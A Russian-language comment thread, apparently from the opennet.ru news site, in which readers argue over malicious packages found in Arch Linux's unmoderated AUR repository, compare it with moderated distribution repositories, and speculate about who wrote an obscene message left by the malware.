    Вот только у разных дистров разные полиси, в каком-нибудь Debian они настолько анальные, что потенциальный зловредник либо плюнет, не выдержав духоты, либо не осилит её пройти.

    И потом, в дистрах здорового человека попробуй ещё зловред засунуть специально. Если это не будет выглядеть как ошибка по невнимательности, то в конечном итоге сопровождающий получит чёрную метку и с этим пятном позора будет он работу искать анонимным удалёнщиков в сомнительных стартапах.

    А в AUR сюрприз-сюрприз, может откладывать свои клады любой желающий без подобных проверок и последствий, поэтому такой результат.

     

  • 1.35, Испанский стыд (?), 18:09, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    > ... поставьте нормальный дистр и не позорьтесь ...

    Не позорил бы cpакир себя NEOcиляTORством Арча, учительницу русского языка и испoлнительную влaсть РФ - что до сих пор к mamке за ухо не отвели.

     
  • 1.38, Аноним (38), 18:12, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +1 +/
    >вывод нецензурного сообщения на русском языке

    Сообщение с обращением на "вы", "хотяб" написано слитно. Какой-то нерусскоязычный деятель.

     
     
  • 2.52, Аноним (52), 18:52, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Да там сразу видно, что строка -- выхлоп ИИ или какого-то переводчика. Ещё с месяцем гордости поздравил, а это ну совсем Трампанальная тема.
     
     
  • 3.59, Аноним (59), 19:25, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +2 +/
    Сразу видно ему Строка совершенно явно написана человеком Или по-крайней мер... большой текст свёрнут, показать
     
     
  • 4.71, Аноним (71), 20:36, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    как то маловато данных для какогото внятного анализа, какой взрослый человек нарежет свой kal на кусочки и станет забрасывать его в почтовые ящики?

    стоять возле подьездов и ждать, чтобы ктото открыл дверь, или даже обмазывать ручки дверей этих дверей.

    сравните с тем самым джин таном, который месяцами втирался в доверие, дети балуются с js

     
     
  • 5.76, Аноним (-), 21:26, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Да нет, пожалуй Есть способ проверить попробуй сочинить промт который выдаст ч... большой текст свёрнут, показать
     
     
  • 6.88, Аноним (71), 00:19, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    я пример с ручками взял не с проста махать всех под одно гребенку, ну такое и... большой текст свёрнут, показать
     
     
  • 7.92, Аноним (92), 01:32, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Твой пример сручками, не является аргументом чему-либо, он лишь поясняет твою по... большой текст свёрнут, показать
     
     
  • 8.99, Аноним (71), 05:15, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    да прятали, много раз, наркотрафик, 0 эффекта ну это конечно факт, однако и чело... большой текст свёрнут, показать
     
  • 7.94, Аноним (94), 02:02, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Кланвары это не то, о чём я говорю Я говорю о ситуации, когда ты идёшь хилом, п... большой текст свёрнут, показать
     
     
  • 8.100, Аноним (71), 05:33, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    прям боль отчасти поэтому я бросил онлайн, вероятность адекватов, ну 50 50, ... текст свёрнут, показать
     
  • 6.176, Наблюдательный наблюдатель (?), 11:01, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >[оверквотинг удален]
    > переходящее на личности совершенно беспричинно. Я типичный представитель этих русских
    > и планов.
    >> сравните с тем самым джин таном, который месяцами втирался в доверие,
    > У джинтана очевидно цели были другие.
    >> дети балуются с js
    > Возможно и дети, в смысле что-нибудь в районе 20. Но вот для
    > этого суждения данных действительно недостаточно. Лехко можно представить сбее какую-нибудь
    > современную местечковую субкультуру подцепившую олбанию каким-то образом. Представить
    > себе "дитё" которое намеренно выискивало какой-нибудь допотопный мем, чтобы выглядеть
    > взрослее, а потом переврало его, мне как-то затруднительно.

    Ох, уважаемый, загнули вы коненчо.
    Вставлю свои пять...
    Порой взрослость не значит возсраст и наоборот.
    Если по себе судить, опыта больше стало, то да.
    А вот ума взрослого не особо-то и прибавилось. Как был дураком в 16, так и остался, так просто в теле постарел, память уже не та.

     
  • 5.104, Xo (?), 07:18, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Не заблуждайтесь на счёт людей, тура4ки будут всегда вне зависимости от возраста и ума.
     
  • 4.85, Аноним (2), 23:41, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    это был молдавский вирус так-то, по стилистике челик сам из ца рачика
     
  • 2.53, Аноним (52), 18:54, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +1 +/
    И "албанский" вместо "олбанский", тухломлмка...
     
  • 2.60, Аноним (59), 19:31, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +5 +/
    Именно что русский. Неруссконатив не умеет таких ашипок совершать. Он скорее с падежами и родами будет путать и использовать неподходящие предлоги и приставки.
     
     
  • 3.153, Аноним (153), 06:35, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Он скорее с падежами и родами будет путать и использовать неподходящие предлоги и приставки.

    Это если иностранец худо бедно знает язык и пишет сам или может через переводчика перевести и сам написать, а вот для ИИ написать такую строку - как нефиг делать.

     
  • 2.175, Граммар ненаци (?), 10:54, 16/06/2026 Скрыто ботом-модератором     [к модератору]
  • +/
     

  • 1.54, небесный ученый (?), 18:54, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +2 +/
    кстати, вспомнилось как с пол года назад пытались гасить инфраструктуру Арча
    https://archlinux.org/news/recent-services-outages/
    где-то с месяц чувствовались периодичные перебои
    теперь вот это
    возможно даже звенья одной цепи
    выхлопа как и смысла по итогу ноль, но нагадить нагадили
     
     
  • 2.177, Анонимский Аноним (?), 11:08, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > кстати, вспомнилось как с пол года назад пытались гасить инфраструктуру Арча
    > https://archlinux.org/news/recent-services-outages/
    > где-то с месяц чувствовались периодичные перебои
    > теперь вот это
    > возможно даже звенья одной цепи
    > выхлопа как и смысла по итогу ноль, но нагадить нагадили

    Как это ноль? Некоторые, кто ума имеют, может задумаются, а надо ли им с этими AURами связываться в таком случае?! И правильно сделают, думать - полезно!

     

  • 1.56, name (??), 19:00, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +5 +/
    Кто-то сильно завидует главному десктопному дистрибутиву.
     
     
  • 2.61, Аноним (61), 19:36, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    OpenSUSE?
     
     
  • 3.64, Аноним (64), 20:03, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • –1 +/
    микропрограммные окна
     
     
  • 4.67, Аноним (71), 20:19, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    mikroprogramm windows, даже не знаю что это могло бы быть
     
  • 2.131, Аноним (131), 15:18, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Убунте завидует все.
     
  • 2.178, Анонимский Аноним (?), 11:09, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Кто-то сильно завидует главному десктопному дистрибутиву.

    Бгг, рассмешил старика! ;)

     

  • 1.62, Rev (ok), 19:47, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –3 +/
    Но ведь ставить программы из репозитория ТАК УДОБНО! И обновлять весь софт одной командой удобно - вжух, и больше нет у тебя секретов!
     
     
  • 2.66, Аноним (71), 20:17, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +2 +/
    угу, и канализация тоже удобна, хотя через нее могут залезть в дом черепашки мутанты, я по телевизору видел, там не врут
     
  • 2.77, Аноним (2), 21:31, 14/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Но ведь ставить программы из репозитория ТАК УДОБНО! И обновлять весь софт
    > одной командой удобно - вжух, и больше нет у тебя секретов!

    Ну yaourt предупреждал, что надо прочитать скрипт с помойки перед установкой.

     
     
  • 3.179, Аноним (150), 11:11, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    >> Но ведь ставить программы из репозитория ТАК УДОБНО! И обновлять весь софт
    >> одной командой удобно - вжух, и больше нет у тебя секретов!
    > Ну yaourt предупреждал, что надо прочитать скрипт с помойки перед установкой.

    - yaourt предупреждал
    - yaourt

    Сразу видно бывшего ;)

     

  • 1.79, Аноним (79), 21:44, 14/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Люди придумали столько способов установить всякого хлама, но не придумали единого места откуда это всё удалить. Если придумают, то точно все перейдут на linux. Но это фантастика, оторванная от реальности.
     
  • 1.90, Аноним (90), 01:13, 15/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –2 +/
    Конечно. Потому что немодерируемых репозиториев не должно существовать.
     
     
  • 2.111, Tron is Whistling (?), 09:41, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Именно. С любой хламопомойкой кода будет случаться именно это.
     

  • 1.103, Xo (?), 07:10, 15/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Да и слабенько как-то вышло. Aur то по умолчанию не установлен в арчах, а кто ставит тот шарит с чем может иметь дело😊
     
     
  • 2.115, Аноним (115), 12:48, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    Судя по большинству комментариев, даже читая PKGBUILD'ы можно словить вирусы при попытке собрать нужный пакет с аура %)

    Народ банально не понимает, что игнорируя простое правило "семь раз отмерь, один раз отрежь" (или в данном случае "семь раз прочти, один раз собери"), они добровольно позволяют выстрелить им в ногу. Зато кричать об ненужности умеют, да.

     
     
  • 3.149, Аноним (149), 20:46, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Народ банально не понимает, что игнорируя простое правило "семь раз отмерь, один раз отрежь" (или в данном случае "семь раз прочти, один раз собери"), они добровольно позволяют выстрелить им в ногу. Зато кричать об ненужности умеют, да.

    Ты посмотри, у нас тут эксперт! Вообще-то нормальный репозиторий не должен требовать чтения каждого рецепта сборки каждым пользователем, чтобы избежать ногострела. И в нормальных репозиториях эта проблема решена очень просто - туда не может взять и закоммитить хрен с горы, да ещё и поверх чужой работы, потому что коммиты проверяются. А тут немодерируемая помойка, и да, она в таком виде не нужна, а так как без неё бесполезен арч, не нужен и арч.

     
  • 2.180, ЛщЛ (?), 11:14, 16/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    > Да и слабенько как-то вышло. Aur то по умолчанию не установлен в
    > арчах, а кто ставит тот шарит с чем может иметь дело😊

    Я вам секретный секрет открою и тайную тайну. AUR это "прелесть" арчеводов, которой они гордятся и когда удобно, они трындят, что для Arch есть жи AUR - аналоговнет! А как какой-то очередной продолб, так сразу, это неофициальные репы, каждый сам ставит на свой страх и риск!

    Переобуваться в прыжке это одни из первых уроков в рачешколе видимо.

     

  • 1.107, Аноним (107), 07:53, 15/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    дипломная работа лейтенанта гру походу, ононима с опеннета
     
     
  • 2.108, Аноним (71), 07:59, 15/06/2026 [^] [^^] [^^^] [ответить]  
  • +/
    да уж, а курсовик у него в онлайн играх на вопрос как развернуть на весь жкран, отвечать alt+f4 ?
     

  • 1.114, Аноним1231 (?), 12:40, 15/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • –1 +/
    А какой RAC предлагают использовать?

    надеюсь не этот...
    https://en.wikipedia.org/wiki/Rock_Against_Communism

     
  • 1.143, Аноним (143), 16:48, 15/06/2026 [ответить] [﹢﹢﹢] [ · · · ]  
  • +/
    Bun:
    Rust 45.5%
    Zig 32.1%
    C++ 13.9%
    TypeScript 5.3%
    C 1.8%
    JavaScript 0.9%
    Other 0.5%
    Ужос нах. Неудивительно, что разработчики уже сами заблудились на предмет, что может натворить.
     

     Добавить комментарий
    Имя:
    E-Mail:
    Текст:



    Партнёры:
    PostgresPro
    Inferno Solutions
    Hosting by Hoster.ru
    Хостинг:

    Закладки на сайте
    Проследить за страницей
    Created 1996-2026 by Maxim Chirkov
    Добавить, Поддержать, Вебмастеру